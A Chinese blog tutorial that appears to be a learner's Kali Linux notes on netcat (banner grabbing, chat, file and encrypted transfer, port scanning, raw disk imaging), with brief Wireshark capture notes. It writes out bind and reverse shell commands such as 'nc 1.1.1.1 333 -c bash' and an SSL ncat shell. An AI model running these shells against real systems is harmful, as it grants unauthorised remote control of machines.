赞
踩
开始进行kali linux学习(修仙ing)
获取banner信息
nc -nv 1.1.1.1 110 //pop3服务
nc -nv 1.1.1.1 25 //smtp服务
nc -nv 1.1.1.1 80 //http服务
关于获取banner信息还有许多其他的工具可以利用,比如nmap还有dmitry都是kali自带的工具,都可以进行banner信息的获取。不一一举例。
通过nc -h
查看功能
这个功能可以用来连接两台主机。进行聊天对话沟通。
A: nc -l -p 4444
B: nc -nv 1.1.1.1 4444
第一台主机代表服务端需要先侦听一个端口,使用第一条命令,-l
代表listen,也就是听的意思,-p
指的是端口,意思就是告诉nc我想要侦听4444端口。
第二台主机代表客户端,使用nc连接服务端的这个端口,就可以进行聊天。前提条件是,客户端必须知道服务端开启的端口和IP地址。
连接状态一方终止两边都会终止。
A: nc -lp 333 > 1.mp4 #接收端
B: nc -nv 1.1.1.1 333 < 1.mp4 -q 1 #发送端
接收端表示侦听一个333端口,并将接受的文件输出到1.MP4文件。
发送端表示nc连接输入文件进行发送。-q 1
表示如果传送结束1秒后自动退出服务。(文件比较大的话可以使用这个比较方便)
简单来说就是A开启服务后,等待着B来给他发送文件。
或者使用这样的方式传输文件
A: nc -q 1 -lp 333 < a.mp4
B: nc -nv 1.1.1.1 333 > 2.mp4
A作为发送端,先将服务开启,然后B进行连接,一旦连接成功,就会进行传输,完成后一秒关闭连接。
这个是A开启服务后,准备一个文件,然后等待B来连接它并接收这个文件。
以上是两种传输方式,可以A传输给B也可以B传输给A。
目录的传输也可以双向传输,与上述文件传输类似。下面只写一个方向。
可以使用以下命令
A: tar -cvf -music/ | nc -lp 333 -q 1
B: nc -nv 1.1.1.1 333 | tar -xvf -
cvf
是将文件打包的作用,然后将打包后的文件灌输到管道中,使用nc进行传输。等待B连接。
B连接后接收到来自A端的文件,使用xvf
解压tar包。还原成目录。
使用命令
A: mcrypt --flush -Fbq -a rijndael-256 -m ecb < a.mp4 | nc -nv 1.1.1.1 333 -q 1
B: nc -lp 333 | mcrypt --flush -Fbqd -a rijndael-256 -m ecb > 1.mp4
这个是不用记的,毕竟这么长。
输入完整命令后,在A端也就是发送端会提示让输入密码(自己设置),设置密码后,再次进行输入(密码不显示,直接输入就行)。
在B端进行连接就会提示输入密码。这个密码就是A端设置的密码。输入正确就就可以接收。
注:这个加密并不是nc自带的加密方式。而是利用了另一个程序的功能。这个程序名叫mcrypt,这个kali里面没有自带,需要自行安装。
安装方法直接用apt-get包管理器就行。
apt-get install mcrypt -y
使用命令
A: cat 1.mp4 | nc -lp 333 # 服务端
B: nc -nv 1.1.1.1 333 | mplayer -vo x11 -cache 3000- # 客户端
cat是查看文本信息的,这里也可以用来查看1.MP4的信息
mplayer是一个媒体播放应用。
cache 3000 表示缓存大小。
端口扫描有好多工具可以使用。比如:nmap、Dmitry、netcat(也就是nc),这些都是kali当中自带的工具。
这里主要介绍学习nc
其他的后续可能会写。
nc -nvz IP地址 端口范围
如:nc -nvz 192.168.40.138 1-5000
A: nc -lp 333 | dd of=/dev/sda #接收方
B: dd if=/dev/sda | nc -nv 1.1.1.1 333 -q 1 #这里B相当于被取证的电脑
#正向
A: nc -lp 333 -c bash #服务器端
B: nc 1.1.1.1 333 #客户端
#反向
A: nc -lp 333 #客户端
B: nc 1.1.1.1 333 -c bash #服务器端
这里利用shell使得用nc连接的用户可以进行远程控制
bash是linux系统自带的shell。
注:windows用户把bash改成cmd
A: ncat -c bash -allow 192.168.20.14 -vnl 333 -ssl
B: ncat -nv 1.1.1.1 333 -ssl
参数说明:
A:首先ncat需要给出一个bash(本地shell),然后-allow
允许,后面加一个IP地址,是服务器端只允许指定的IP访问或连接。并且侦听一个端口333
B:直接连接就行
连接成功后服务器端会显示Ncat:Connection from [ip] [port]
其实过程中两台主机已经进行了SSL证书验证和指纹识别。
这个时候使用无论输入什么命令或者传输什么信息,都是经过加密的。这里两台主机传输信息的管道就是加密的。
SSL加密有一定的安全性保障,每次使用,它的指纹信息都是重新生成的。
不同系统/平台的nc参数功能不一定相同。比如Ubuntu的和kali的就不一样。
这个工具应该都了解,渗透工具排行榜第一。(突然想到了小说)
打开后回看到这样的(windows系统中)
选择一个进行扑捉流量数据,抓包的时候选择具体要抓哪个网卡的数据包。
如果这样还找不到自己想抓的包是哪个的话,就将鼠标移动到过滤器上,就能看到它的IP。
kali当中的wireshark
emmmm刚打开可能会需要输入密码,将kali的用户密码输进去就行了。(我用的是普通用户登录)可能root用户不用,看情况自定。
上图中箭头指的地方就是以太网。双击即可进行抓包。
点击这里停止抓包。
下一步,点击这里会出现可以选择的只抓取哪个特定的端口或服务。
比如只抓80端口的数据。
还可以输入指定IP来抓取数据包。
不过我不想设置,懒。整那么多花里胡哨的做什么。
这些功能基本都在统计里面,没有汉化的版本,名字叫Statistics
我们知道他们在演戏,他们也知道自己在演戏,他们也知道我们知道他们在演戏,我们也知道他们知道我们知道他们在演戏。——佚名
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。